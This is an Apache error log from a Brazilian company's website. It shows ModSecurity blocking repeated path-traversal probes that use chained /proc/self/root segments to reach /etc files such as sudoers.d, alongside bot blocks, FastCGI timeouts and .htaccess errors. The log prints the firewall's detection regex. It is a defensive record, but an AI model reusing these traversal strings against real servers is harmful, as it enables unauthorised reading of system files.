[Thu Mar 19 08:10:13.976497 2026] [:error] [pid 26799:tid 140411699963648] [client 74.7.243.128:34102] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/varnish"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abvZlda6ubjKNq_cu4Y4hgAAA0U"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 08:10:31.133787 2026] [proxy_fcgi:error] [pid 19093:tid 140411658000128] (70007)The timeout specified has expired: [client 179.188.53.243:46644] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 08:10:34.115288 2026] [:error] [pid 31803:tid 140411666392832] [client 74.7.243.128:54326] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/sysconfig"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abvZquyqAr6etmhZHNpOUQAAAEk"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 08:10:35.422112 2026] [:error] [pid 26799:tid 140411716749056] [client 74.7.243.128:58570] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/wpa_supplicant"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abvZq9a6ubjKNq_cu4Y4iAAAA0M"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 08:10:40.620243 2026] [:error] [pid 27403:tid 140411632822016] [client 74.7.243.128:58580] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/selinux"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abvZsBkFeYa1D6dYQnDbowAAAc0"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 08:10:41.894582 2026] [:error] [pid 17887:tid 140411540502272] [client 74.7.243.128:32908] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/percona-server.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abvZsQkwaGbbGflqUZCn8wAAANg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 08:10:43.215250 2026] [:error] [pid 30077:tid 140411574073088] [client 74.7.243.128:32918] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/wpa_supplicant"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abvZs_u8EFLIOrSqIpuN6gAAAlQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 08:10:53.057817 2026] [proxy_fcgi:error] [pid 17653:tid 140411582465792] (70007)The timeout specified has expired: [client 179.188.53.243:47250] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 08:11:15.137802 2026] [proxy_fcgi:error] [pid 17653:tid 140411658000128] (70007)The timeout specified has expired: [client 179.188.53.243:47806] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 08:11:31.409257 2026] [:error] [pid 17653:tid 140411616036608] [client 74.7.243.128:32926] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/percona-server.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abvZ48df6f5d65gmYZRgPwAAAs8"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 08:11:37.125783 2026] [proxy_fcgi:error] [pid 14269:tid 140411599251200] (70007)The timeout specified has expired: [client 179.188.53.243:48380] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 08:11:56.035374 2026] [:error] [pid 31803:tid 140411557287680] [client 74.7.228.61:53098] [client 74.7.228.61] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abvZ_OyqAr6etmhZHNpOZgAAAFY"]
[Thu Mar 19 08:12:00.169790 2026] [proxy_fcgi:error] [pid 26799:tid 140411733534464] (70007)The timeout specified has expired: [client 179.188.53.243:48882] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 08:12:08.121425 2026] [:error] [pid 30077:tid 140411649607424] [client 74.7.243.128:54090] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/selinux"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abvaCPu8EFLIOrSqIpuOHQAAAks"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 08:12:24.041832 2026] [proxy_fcgi:error] [pid 17887:tid 140411616036608] (70007)The timeout specified has expired: [client 179.188.53.243:49558] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 08:12:46.069838 2026] [proxy_fcgi:error] [pid 17653:tid 140411708356352] (70007)The timeout specified has expired: [client 179.188.53.243:50030] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 08:13:11.836230 2026] [mime_magic:error] [pid 27403:tid 140411674785536] (70014)End of file found: [client 57.141.18.64:51142] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Thu Mar 19 08:13:17.057781 2026] [proxy_fcgi:error] [pid 27293:tid 140411741927168] (70007)The timeout specified has expired: [client 179.188.53.243:50692] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 08:13:43.051195 2026] [proxy_fcgi:error] [pid 31803:tid 140411699963648] (70007)The timeout specified has expired: [client 179.188.53.243:51370] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 08:14:11.553817 2026] [proxy_fcgi:error] [pid 27403:tid 140411582465792] (70007)The timeout specified has expired: [client 179.188.53.243:52036] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 08:14:12.126395 2026] [:error] [pid 27293:tid 140411641214720] [client 74.7.243.128:55182] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/plymouth"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abvahP-YZRR_7pZ7nDJ5jAAAA8w"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 08:14:22.627019 2026] [:error] [pid 19093:tid 140411540502272] [client 74.7.244.43:47490] [client 74.7.244.43] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abvajl_V7PWP6ixUYl6o_gAAApg"]
[Thu Mar 19 08:14:34.129767 2026] [proxy_fcgi:error] [pid 14269:tid 140411649607424] (70007)The timeout specified has expired: [client 179.188.53.243:52514] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 08:14:55.415287 2026] [proxy_fcgi:error] [pid 26799:tid 140411666392832] (70007)The timeout specified has expired: [client 179.188.53.243:52896] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 08:15:17.145775 2026] [proxy_fcgi:error] [pid 27293:tid 140411624429312] (70007)The timeout specified has expired: [client 179.188.53.243:53308] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 08:15:24.073605 2026] [:error] [pid 30077:tid 140411540502272] [client 74.7.243.128:53264] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/sudoers.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abvazPu8EFLIOrSqIpuOeAAAAlg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 08:15:39.134266 2026] [proxy_fcgi:error] [pid 30077:tid 140411658000128] (70007)The timeout specified has expired: [client 179.188.53.243:53670] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 08:15:39.780075 2026] [mime_magic:error] [pid 17653:tid 140411574073088] (70014)End of file found: [client 57.141.18.15:53340] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Thu Mar 19 08:15:59.881054 2026] [:error] [pid 14269:tid 140411548894976] [client 74.7.243.128:33402] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/selinux"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abva7wbLMZ6AikZjR9VJYQAAABc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 08:16:01.129782 2026] [proxy_fcgi:error] [pid 27293:tid 140411691570944] (70007)The timeout specified has expired: [client 179.188.53.243:54102] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 08:16:07.254682 2026] [mime_magic:error] [pid 26799:tid 140411674785536] (70014)End of file found: [client 57.141.18.89:55396] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Thu Mar 19 08:16:23.138172 2026] [proxy_fcgi:error] [pid 14269:tid 140411607643904] (70007)The timeout specified has expired: [client 179.188.53.243:54470] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 08:16:27.160347 2026] [mime_magic:error] [pid 15826:tid 140411649607424] (70014)End of file found: [client 74.7.241.31:46828] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php, referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/lib
[Thu Mar 19 08:16:45.129784 2026] [proxy_fcgi:error] [pid 31803:tid 140411632822016] (70007)The timeout specified has expired: [client 179.188.53.243:54912] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 08:17:07.034681 2026] [proxy_fcgi:error] [pid 14269:tid 140411691570944] (70007)The timeout specified has expired: [client 179.188.53.243:55344] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 08:17:14.542944 2026] [core:alert] [pid 26799:tid 140411582465792] [client 57.141.18.60:57178] /home/storage/0/fc/16/bandeirantesbomb3/public_html/.htaccess: </FilesMatch> without matching <FilesMatch> section
[Thu Mar 19 08:17:14.584948 2026] [:error] [pid 26799:tid 140411624429312] [client 74.7.228.61:47856] [client 74.7.228.61] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abvbOta6ubjKNq_cu4Y5lwAAA04"]
[Thu Mar 19 08:17:25.252541 2026] [:error] [pid 17653:tid 140411649607424] [client 74.7.243.128:39444] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/sysconfig"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abvbRcdf6f5d65gmYZRhAQAAAss"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 08:17:28.153867 2026] [proxy_fcgi:error] [pid 26799:tid 140411565680384] (70007)The timeout specified has expired: [client 179.188.53.243:55756] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 08:17:38.840155 2026] [:error] [pid 17653:tid 140411674785536] [client 74.7.243.128:54676] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/zabbix"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abvbUsdf6f5d65gmYZRhDgAAAsg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 08:17:51.133798 2026] [proxy_fcgi:error] [pid 15826:tid 140411540502272] (70007)The timeout specified has expired: [client 179.188.53.243:56130] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 08:18:02.030585 2026] [core:alert] [pid 14269:tid 140411691570944] [client 74.7.243.128:49450] /home/storage/0/fc/16/bandeirantesbomb3/public_html/.htaccess: </FilesMatch> without matching <FilesMatch> section, referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/bin
[Thu Mar 19 08:18:06.881440 2026] [mime_magic:error] [pid 19093:tid 140411540502272] (70014)End of file found: [client 57.141.18.48:58740] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Thu Mar 19 08:18:19.129785 2026] [proxy_fcgi:error] [pid 17653:tid 140411733534464] (70007)The timeout specified has expired: [client 179.188.53.243:56654] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 08:18:52.125790 2026] [proxy_fcgi:error] [pid 30077:tid 140411725141760] (70007)The timeout specified has expired: [client 179.188.53.243:57320] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 08:19:21.137789 2026] [proxy_fcgi:error] [pid 31803:tid 140411725141760] (70007)The timeout specified has expired: [client 179.188.53.243:57940] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 08:19:27.012769 2026] [:error] [pid 31803:tid 140411548894976] [client 74.7.244.43:50916] [client 74.7.244.43] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abvbv-yqAr6etmhZHNpPWgAAAFc"]
[Thu Mar 19 08:19:43.656974 2026] [:error] [pid 27293:tid 140411658000128] [client 74.7.243.128:59694] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/varnish"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abvbz_-YZRR_7pZ7nDJ6NQAAA8o"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 08:19:51.081841 2026] [proxy_fcgi:error] [pid 17653:tid 140411565680384] (70007)The timeout specified has expired: [client 179.188.53.243:58640] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 08:20:21.933948 2026] [proxy_fcgi:error] [pid 14269:tid 140411733534464] (70007)The timeout specified has expired: [client 179.188.53.243:59356] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 08:20:26.454515 2026] [mime_magic:error] [pid 14269:tid 140411599251200] (70014)End of file found: [client 57.141.18.68:33510] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Thu Mar 19 08:20:48.127774 2026] [proxy_fcgi:error] [pid 27403:tid 140411691570944] (70007)The timeout specified has expired: [client 179.188.53.243:60034] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 08:20:56.230970 2026] [mime_magic:error] [pid 27293:tid 140411658000128] (70014)End of file found: [client 57.141.18.111:34424] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Thu Mar 19 08:21:10.151843 2026] [proxy_fcgi:error] [pid 31803:tid 140411582465792] (70007)The timeout specified has expired: [client 179.188.53.243:60508] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 08:21:23.587904 2026] [core:alert] [pid 27403:tid 140411540502272] [client 57.141.18.111:33870] /home/storage/0/fc/16/bandeirantesbomb3/public_html/.htaccess: </FilesMatch> without matching <FilesMatch> section
[Thu Mar 19 08:21:34.133857 2026] [proxy_fcgi:error] [pid 17887:tid 140411649607424] (70007)The timeout specified has expired: [client 179.188.53.243:32888] AH01075: Error dispatching request to : (polling)
